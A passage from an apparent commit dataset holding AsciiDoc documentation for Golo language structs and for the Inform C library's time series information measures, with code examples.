structure\ncontent.\n\nGiven the following program:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n println(Point(1, 2)) \n}\n----\n\nrunning it prints the following console output:\n\n----\nstruct Point{x=1, y=2}\n----\n\n=== Immutable structs ===\n\nStructure instances are mutable by default. Golo generates a factory function with the `Immutable`\nprefix to directly build immutable instances:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n\n let p = ImmutablePoint(1, 2)\n println(p)\n\n try {\n # Fails! (p is immutable)\n p: x(100)\n } catch (expected) {\n println(expected: getMessage())\n }\n}\n----\n\n=== Copying ===\n\nInstances of a structure provide copying methods:\n\n- `copy()` returns a *shallow* copy of the structure instance, and\n- `frozenCopy()` returns a read-only *shallow* copy.\n\nTrying to invoke any setter methods on an instance obtained through `frozenCopy()` raises a\n`java.lang.IllegalStateException`.\n\nIMPORTANT: The result of calling `copy()` on a frozen instance **is a mutable** copy, not a frozen\ncopy.\n\n=== `equals()` and `hashCode()` semantics ===\n\nGolo structures honor the contract of Java objects regarding equality and hash codes.\n\nBy default, `equals()` and `hashCode()` are the ones of `java.lang.Object`. Indeed, structure\nmembers can be changed, so they cannot be used to compute stable values.\n\nNevertheless, structure instances returned by `frozenCopy()` have stable members, and members are\nbeing used.\n\nConsider the following program:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n \n let p1 = Point(1, 2)\n let p2 = Point(1, 2)\n let p3 = p1: frozenCopy()\n let p4 = p1: frozenCopy()\n\n println(\"p1 == p2 \" + (p1 == p2))\n println(\"p1 == p3 \" + (p1 == p3))\n println(\"p3 == p4 \" + (p3 == p4))\n\n println(\"#p1 \" + p1: hashCode())\n println(\"#p2 \" + p2: hashCode())\n println(\"#p3 \" + p3: hashCode())\n println(\"#p4 \" + p4: hashCode())\n}\n----\n\nthe console output is the following:\n\n----\np1 == p2 false\np1 == p3 false\np3 == p4 true\n#p1 1555845260\n#p2 104739310\n#p3 994\n#p4 994\n----\n\nTIP: It is recommended that you use `Immutable<name of struct>(...)` or `frozenCopy()` when you can,\nespecially when storing values into collections.\n\n=== Helper methods ===\n\nA number of helper methods are being generated:\n\n- `members()` returns a tuple of the member names,\n- `values()` returns a tuple with the current member values,\n- `isFrozen()` returns a boolean to check for frozen structure instances,\n- `iterator()` provides an iterator over a structure where each element is a tuple `[member, value]`,\n- `get(name)` returns the value of a member by its name,\n- `set(name, value)` updates the value of a member by its name, and returns the same structure.\n\n=== Private members ===\n\nBy default, all members in a struct can be accessed. It is possible to make some elements private by\nprefixing them with `_`, as in:\n\n----\nstruct Foo = { a, _b, c }\n\n# (...)\n\nlet foo = Foo(1, 2, 3)\n----\n\nIn this case, `_b` is a private struct member. This means that `foo: _b()` and `foo: _b(666)` are\nvalid calls only if made from:\n\n- a function from the declaring module, or\n- an augmentation defined in the declaring module.\n\nAny call to, say, `foo: _b()` from another module will yield a `NoSuchMethodError` exception.\n\nPrivate struct members also have the following impact:\n\n- they do not appear in `members()` and `values()` calls, and\n- they are not iterated through `iterator()`-provided iterators, and\n- they are being used like other members in `equals()` and `hashCode()`, and\n- they do not appear in `toString()` representations.\n\n","old_contents":"== Structs ==\n\nGolo allows the definition of simple structures using the `struct` keyword. They resemble structures\nin procedural languages such as C `struct` or Pascal *records*. They are useful to store data when\nthe set of named entries is fixed.\n\n=== Definition ===\n\nStructures are defined at the module-level:\n\n----\nmodule sample\n\nstruct Person = { name, age, email }\n\nfunction main = |args| {\n let p1 = Person(\"Mr Bean\", 54, \"bean@gmail.com\")\n println(p1: name())\n let p2 = Person(): name(\"John\"): age(32): email(\"john@b-root.com\")\n println(p2: age())\n}\n----\n\nWhen declaring a structure, it also defines two factory functions: one with no arguments, and one\nwith all arguments in their order of declaration in the `struct` statement. When not initialized,\nmember values are `null`.\n\nEach member yields a *getter* and a *setter* method: given a member `a`, the getter is method `a()`\nwhile the setter is method `a(newValue)`. It should be noted that setter methods return the\nstructure instance which makes it possible to chain calls as illustrated in the previous example\nwhile building `p2`.\n\n=== JVM existence ===\n\nEach `struct` is compiled to a self-contained JVM class.\n\nGiven:\n\n----\nmodule sample\n\nstruct Point = { x, y }\n----\n\na class `sample.types.Point` is being generated.\n\nIt is important to note that:\n\n1. each `struct` class is `final`,\n2. each `struct` class inherits from `gololang.GoloStruct`,\n3. proper definitions of `toString()`, `hashCode()` and `equals()` are being provided.\n\n=== `toString()` behavior ===\n\nThe `toString()` method is being overridden to provide a meaningful description of a structure\ncontent.\n\nGiven the following program:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n println(Point(1, 2)) \n}\n----\n\nrunning it prints the following console output:\n\n----\nstruct Point{x=1, y=2}\n----\n\n=== Immutable structs ===\n\nStructure instances are mutable by default. Golo generates a factory function with the `Immutable`\nprefix to directly build immutable instances:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n\n let p = ImmutablePoint(1, 2)\n println(p)\n\n try {\n # Fails! (p is immutable)\n p: x(100)\n } catch (expected) {\n println(expected: getMessage())\n }\n}\n----\n\n=== Copying ===\n\nInstances of a structure provide copying methods:\n\n- `copy()` returns a *shallow* copy of the structure instance, and\n- `frozenCopy()` returns a read-only *shallow* copy.\n\nTrying to invoke any setter methods on an instance obtained through `frozenCopy()` raises a\n`java.lang.IllegalStateException`.\n\nIMPORTANT: The result of calling `copy()` on a frozen instance **is a mutable** copy, not a frozen\ncopy.\n\n=== `equals()` and `hashCode()` semantics ===\n\nGolo structures honor the contract of Java objects regarding equality and hash codes.\n\nBy default, `equals()` and `hashCode()` are the ones of `java.lang.Object`. Indeed, structure\nmembers can be changed, so they cannot be used to compute stable values.\n\nNevertheless, structure instances returned by `frozenCopy()` have stable members, and members are\nbeing used.\n\nConsider the following program:\n\n----\nmodule test\n\nstruct Point = { x, y }\n\nfunction main = |args| {\n \n let p1 = Point(1, 2)\n let p2 = Point(1, 2)\n let p3 = p1: frozenCopy()\n let p4 = p1: frozenCopy()\n\n println(\"p1 == p2 \" + (p1 == p2))\n println(\"p1 == p3 \" + (p1 == p3))\n println(\"p3 == p4 \" + (p3 == p4))\n\n println(\"#p1 \" + p1: hashCode())\n println(\"#p2 \" + p2: hashCode())\n println(\"#p3 \" + p3: hashCode())\n println(\"#p4 \" + p4: hashCode())\n}\n----\n\nthe console output is the following:\n\n----\np1 == p2 false\np1 == p3 false\np3 == p4 true\n#p1 1555845260\n#p2 104739310\n#p3 994\n#p4 994\n----\n\nTIP: It is recommended that you use `Immutable<name of struct>(...)` or `frozenCopy()` when you can,\nespecially when storing values into collections.\n\n=== Helper methods ===\n\nA number of helper methods are being generated:\n\n- `members()` returns a tuple of the member names,\n- `values()` returns a tuple with the current member values,\n- `isFrozen()` returns a boolean to check for frozen structure instances,\n- `iterator()` provides an iterator over a structure where each element is a tuple `[member, value]`,\n- `get(name)` returns the value of a member by its name,\n- `set(name, value)` updates the value of a member by its name, and returns the same structure.\n\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"61b37e38d626c19fc84ec2977a10bf616b15b44f","subject":"Remove garbage in PID documentation","message":"Remove garbage in PID documentation\n","repos":"dglmoore\/Inform,dglmoore\/Inform,ELIFE-ASU\/Inform,ELIFE-ASU\/Inform","old_file":"docs\/timeseries.adoc","new_file":"docs\/timeseries.adoc","new_contents":"[[time-series-measures]]\n= Time Series Measures\n\nThe original purpose of *Inform* was to analyze time series data. This explains why most of\n*Inform*'s functionality resides in functions specifically optimized for analyzing time\nseries. The API was designed to be easy to use in C or {cpp}, or to be wrapped in a\nhigher-level language, e.g. https:\/\/elife-asu.github.io\/PyInform[Python]. This means that we\navoided some of the \"niceties\" of C, such as extensive use of macros and other generic\natrocities, in favor of wrappability. Keep this in mind as you learn the API.\n\nMany information measures have \"local\" variants which compute a time series of point-wise\nvalues. These local variants have names similar to their averaged or global counterparts,\ne.g <<inform_active_info,inform_active_info>> and\n<<inform_local_active_info,inform_local_active_info>>. We have been meticulous in ensuring\nthat function and parameter names are consistent across measures. If you notice some\ninconsistency, please https:\/\/github.com\/elife-asu\/inform\/issue[report it as an issue].\n\n[[time-series-notation]]\n== Notation\n\nThroughout the discussion of time series measures, we will try to use a consistent notation.\nWe will denote random variables as stem:[X,Y,\\ldots], and let stem:[x_i,y_i,\\ldots]\nrepresent the stem:[i]-th time step of a time series drawn from the associated random\nvariable. Many of the measures consider stem:[k]-histories (a.k.a stem:[k]-blocks) of the\ntime series, e.g. stem:[x_i^{(k)} = \\left\\{x_{i-k+1}, x_{i-k+2},\\ldots,x_i\\right\\}].\n\nWhen denoting probability distributions, we will only make the random variable explicit in\nsituations where the notation is ambiguous. We will typically write stem:[p(x_i)],\nstem:[p(x_i^{(k)})], and stem:[p(x_i^{(k)}, x_{i+1})] to denote the empirical probability\nof observing the stem:[x_i] state, the stem:[x_i^{(k)}] stem:[k]-history, and the joint\nprobability of observing stem:[\\left(x_i^{(k)}, x_{i+1}\\right)].\n\n*Please report any notational ambiguities as an\nhttps:\/\/github.com\/elife-asu\/inform\/issue[issue].*\n\n[[time-series-detail]]\n== Implementation Details\n\n=== The Base: States and Logarithms\nThe word \"base\" has two different meanings in the context of information measures on time\nseries. It could refer to the base of the time series itself, that is the number of unique\nstates in the time series. For example, the time series stem:[\\{0,2,1,0,0\\}] is a base-3\ntime series. On the other hand, it could refer to the base of the logarithm used in\ncomputing the information content of the inferred probability distributions. The problem is\nthat these two meanings clash. The base of the time series affects the range of values the\nmeasure can produce, and the base of the logarithm represents a rescaling of those values.\n\nIn this library we deal with this by *always* using base-2 logarithms, and having the user\nspecify the base of the time series \u2014 don't worry, we <<error-handling, set an error>> if\nthe provided base doesn't make sense. All of this ensures that the library is a simple as\nreasonably possible.\n\n=== Multiple Initial Conditions\nYou generally need *a lot* of data to infer a probability distribution. An experimentalist\nor simulator might then collect data over multiple trials or initial conditions. Most of\n*Inform*'s time series measures allow the user to pass in a two-dimensional, rectangular\narray which each row representing a time series from a different initial condition. From\nthis the probability distributions are inferred, and the desired value is calculated. This\nhas the downside of requiring that the user store all of the data in memory, but it has the\nadvantage of being fast and simple. Trade-offs, man...\n\nA subsequent release, https:\/\/github.com\/elife-asu\/inform\/milestone\/3[likely v1.1.0], will\nallows the initial conditions to have time series of different lengths and will provide\naccumulator implementations of all of these measures that will let the incrementally\nconstruct the distributions. This will lift some of the memory burden at the expense of\nruntime performance.\n\n=== Calling Conventions\nAll of the of the time series functions described in this section use the same basic calling\nconventions and use the same (or similar) argument names were possible.\n\n|===\n| Argument Name | Description\n\n| `series`\n| A 2-D or 3-D, finite-state time series in contiguous, row-major form\n\n| `l`\n| The number of \"sources\" or variables in a 3-D time series\n\n| `n`\n| The number of initial conditions per \"source\"\n\n| `m`\n| The number of time steps per \"source\"\n\n| `b`\n| The base of the time series\n\n| `k`\n| The length history length\n\n| `err`\n| An error argument\n|===\n\nAverage measures generally return a double-precision, floating-point value while local\nvariants return a pointer to an appropriately shaped, contiguous array. Local measures\naccept an argument, often named after the function (e.g. local active information takes an\n`ai` argument), which is used to store the computed local values. If that argument is NULL,\nthen the function allocates an array.\n\nWe will try to note any deviations from these conventions.\n\n[[active-info]]\n== Active Information\n\nActive information (AI) was introduced in <<Lizier2012>> to quantify information storage in\ndistributed computations. Active information is defined in terms of a temporally local\nvariant\n\n[stem]\n++++\na_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nwhere the probabilities are constructed empirically from the _entire_ time series. From the\nlocal variant, the temporally global active information is defined as\n\n[stem]\n++++\nA_X(k) = \\langle a_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nStrictly speaking, the local and average active information are defined as\n\n[stem]\n++++\na_{X,i} = \\lim_{k\\rightarrow \\infty}a_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nA_X = \\lim_{k\\rightarrow \\infty}A_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\n****\n[[inform_active_info]]\n[source,c]\n----\ndouble inform_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble ai = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.305958\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.359879\n----\n****\n\n****\n[[inform_local_active_info]]\n[source,c]\n----\ndouble *inform_local_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, double *ai, inform_error *err);\n----\nCompute the local active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *ai = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ {-0.193, 0.807, 0.222, 0.222, -0.363, 1.222, 0.222}\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai[14];\ninform_local_active_info(series, 2, 9, 2, 2, ai, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ { 0.807, -0.363, 0.637, 0.637, -0.778, 0.807, -1.193,\n\/\/ 0.807, 0.807, 0.222, 0.807, 0.807, 0.222, 0.807 }\n\n\/\/ no need to free since `ai` was statically allocated in this scope\n\/\/ free(ai);\n----\n****\n\n[[block-entropy]]\n== Block Entropy\nBlock entropy, also known as stem:[N]-gram entropy <<Shannon1948>>, is the standard Shannon\nentropy of the stem:[k]-histories of a time series:\n[stem]\n++++\nH(X^{(k)}) = -\\sum_{x_i^{(k)}} p(x_i^{(k)}) \\log_2{p(x_i^{(k)})}\n++++\nwhich reduces to the traditional Shannon entropy for stem:[k=1].\n\n****\n[[inform_block_entropy]]\n[source,c]\n----\ndouble inform_block_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k = 1\ndouble h = inform_block_entropy(series, 1, 9, 2, 1, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 0.991076\n\n\/\/ k = 2\nh = inform_block_entropy(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.811278\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.936278\n----\n****\n\n****\n[[inform_local_block_entropy]]\n[source,c]\n----\ndouble *inform_local_block_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ent, inform_error *err);\n----\nCompute the local block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k == 1\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 1, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 0.848, 0.848, 1.170, 1.170, 1.170, 1.170, 0.848, 0.848, 0.848 }\n\n\/\/ k == 2\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 3.000, 1.415, 1.415, 1.415, 3.000, 1.415, 1.415 }\n\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h[16];\ninform_local_block_entropy(series, 2, 9, 2, 2, h, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 2.415, 2.415, 2.415, 2.415, 2.000, 1.415, 1.415,\n\/\/ 2.000, 1.415, 2.415, 2.000, 1.415, 2.415, 2.000, 1.415 }\n\n\/\/ no need to free since `h` was statically allocated in this scope\n\/\/ free(h);\n----\n****\n\n[[conditional-entropy]]\n== Conditional Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Conditional_entropy[Conditional entropy] is a measure of the\namount of information required to describe a random variable stem:[Y] given knowledge of\nanother random variable stem:[X]. When applied to time series, two time series are used to\nconstruct the empirical distributions, and <<inform_shannon_ce,inform_shannon_ce>> can be\napplied to yield\n[stem]\n++++\nH(Y|X) = - \\sum_{x_i,y_i} p(x_i,y_i) \\log_2{p(y_i|x_i)}.\n++++\nThis can be viewed as the time-average of the local conditional entropy\n[stem]\n++++\nh_i(Y|X) = -\\log_2{p(y_i|x_i)}.\n++++\nSee <<Cover1991>> for more information.\n\n****\n[[inform_conditional_entropy]]\n[source,c]\n----\ndouble inform_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, inform_error *err);\n----\nCompute the conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble ce = inform_conditional_entropy(xs, ys, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.597107\n\nce = inform_conditional_entropy(ys, xs, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.507757\n----\n****\n\n****\n[[inform_local_conditional_entropy]]\n[source,c]\n----\ndouble *inform_local_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, double *mi, inform_error *err);\n----\nCompute the local conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble *ce = inform_local_conditional_entropy(xs, ys, 20, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 3.00, 3.00, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19,\n\/\/ 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.42, 0.42, 0.42, 2.00 }\n\ninform_local_conditional_entropy(ys, xs, 20, 2, 2, ce, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 1.32, 1.32, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10,\n\/\/ 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.74, 0.74, 0.74, 3.91 }\n\nfree(ce);\n----\n****\n\n[[cross-entropy]]\n== Cross Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Cross_entropy[Cross entropy] between two distributions\nstem:[p_X] and stem:[q_X] measures the amount of information needed to identify events\nusing a coding scheme optimized for stem:[q_X] when stem:[p_X] is the \"real\" distributions\nover stem:[X].\n[stem]\n++++\nH(p,q) = -\\sum_{x} p(x) \\log_2{q(x)}\n++++\nCross entropy's local variant is equivalent to the self-information of stem:[q_X], and as\nsuch is implemented by <<inform_local_block_entropy,inform_local_block_entropy>>.\n\nSee <<Cover1991>> for more details.\n****\n[[inform_cross_entropy]]\n[source,c]\n----\ndouble inform_cross_entropy(int const *ps, int const *qs, size_t n,\n int b, inform_error *err);\n----\nCompute the cross entropy between the \"true\" and \"unnatural\" distributions stem:[p_X] and\nstem:[q_X] from associated time series `ps` and `qs`, respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const ps[10] = {0,1,1,0,1,0,0,1,0,0};\nint const qs[10] = {0,0,0,0,0,1,1,0,0,1};\n\ndouble ce = inform_cross_entropy(ps, qs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 1.003530\n\nce = inform_cross_entropy(qs, ps, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.912454\n----\n****\n\n[[effective-information]]\n== Effective Information\n\n****\n[[inform_effective_info]]\n[source,c]\n----\ndouble inform_effective_info(double const *tpm, double const *inter,\n size_t n, inform_error *err);\n----\n****\n\n[[entropy-rate]]\n== Entropy Rate\nhttps:\/\/en.wikipedia.org\/wiki\/Entropy_rate[Entropy rate] quantifies the amount of\ninformation needed to describe the next state of stem:[X] given observations of\nstem:[X^{(k)}]. In other wrods, it is the entropy of the time series conditioned on the\nstem:[k]-histories. The local entropy rate\n[stem]\n++++\nh_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\ncan be averaged to obtain the global entropy rate\n[stem]\n++++\nH_X(k) = \\langle h_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\nMuch as with <<active-info, active information>>, the local and average entropy rates are\nformally obtained in the limit\n[stem]\n++++\nh_{X,i} = \\lim_{k\\rightarrow \\infty}h_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nH_X = \\lim_{k\\rightarrow \\infty}H_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_entropy_rate]]\n[source,c]\n----\ndouble inform_entropy_rate(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble er = inform_entropy_rate(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.679270\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er = inform_entropy_rate(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.625349\n----\n****\n\n****\n[[inform_local_entropy_rate]]\n[source,c]\n----\ndouble *inform_local_entropy_rate(int const *series, size_t n,\n size_t m, int b, size_t k, double *er, inform_error *err);\n----\nCompute the local entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *er = inform_local_entropy_rate(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 1.000, 0.000, 0.585, 0.585, 1.585, 0.000, 1.000 }\nfree(er);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er[14];\ninform_local_entropy_rate(series, 2, 9, 2, 2, er, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 0.415, 1.585, 0.585, 0.585, 1.585, 0.000, 2.000,\n\/\/ 0.000, 0.415, 0.585, 0.000, 0.415, 0.585, 0.000 }\n\n\/\/ no need to free since `er` was statically allocated in this scope\n\/\/ free(er);\n----\n****\n\n[[excess-entropy]]\n== Excess Entropy\n\n****\n[[inform_excess_entropy]]\n[source,c]\n----\ndouble inform_excess_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\n****\n\n****\n[[inform_local_excess_entropy]]\n[source,c]\n----\ndouble *inform_local_excess_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ee, inform_error *err);\n----\n****\n\n[[information-flow]]\n== Information Flow\n\n****\n[[inform_information_flow]]\n[source,c]\n----\ndouble inform_information_flow(int const *src, int const *dst,\n int const *back, size_t l_src, size_t l_dst, size_t l_back,\n size_t n, size_t m, int b, inform_error *err);\n----\n****\n\n[[evidence-of-integration]]\n== Evidence Of Integration\n\n****\n[[inform_integration_evidence]]\n[source,c]\n----\ndouble *inform_integration_evidence(int const *series, size_t l,\n size_t n, int const *b, double *evidence, inform_error *err);\n----\n****\n\n****\n[[inform_integration_evidence_part]]\n[source,c]\n----\ndouble *inform_integration_evidence_part(int const *series, size_t l,\n size_t n, int const *b, size_t const *parts, size_t nparts,\n double *evidence, inform_error *err);\n----\n****\n\n[[mutual-information]]\n== Mutual Information\nhttps:\/\/en.wikipedia.org\/wiki\/Mutual_information[Mutual information] (MI) is a measure of\nthe amount of mutual dependence between at least two random variables. Locally, MI is\ndefined as\n[stem]\n++++\ni_i(X_1,\\ldots,X_l) = \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nThe mutual information is then just the time average of stem:[i_i(X_1,\\ldots,X_l)]:\n[stem]\n++++\nI(X_1,\\ldots,X_l) =\n \\sum_{x_{1,i},\\ldots,x_{l,i}} p(x_{1,i},\\ldots,x_{l,i}) \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nSee <<Cover1991>> for more details.\n\n****\n[[inform_mutual_info]]\n[source,c]\n----\ndouble inform_mutual_info(int const *series, size_t l, size_t n,\n int const *b, inform_error *err);\n----\nCompute the mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble mi = inform_mutual_info(xs, 2, 20, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 0.214171\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\ndouble mi = inform_mutual_info(xs, 3, 20, (int[3]){2,2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 1.095462\n----\n****\n\n****\n[[inform_local_mutual_info]]\n[source,c]\n----\ndouble *inform_local_mutual_info(int const *series, size_t l, size_t n,\n int const *b, double *mi, inform_error *err);\n----\nCompute the local mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble *mi = inform_local_mutual_info(xs, 2, 20, (int[2]){2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { -1.000, -1.000, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 1.585, 1.585, 1.585, -1.585 }\nfree(mi);\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\n\ndouble *mi = inform_local_mutual_info(xs, 3, 20, (int[3]){2,2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 3.322, 3.322, 0.322, 0.152 }\nfree(mi);\n----\n****\n\n[[partial-information-decomposition]]\n== Partial Information 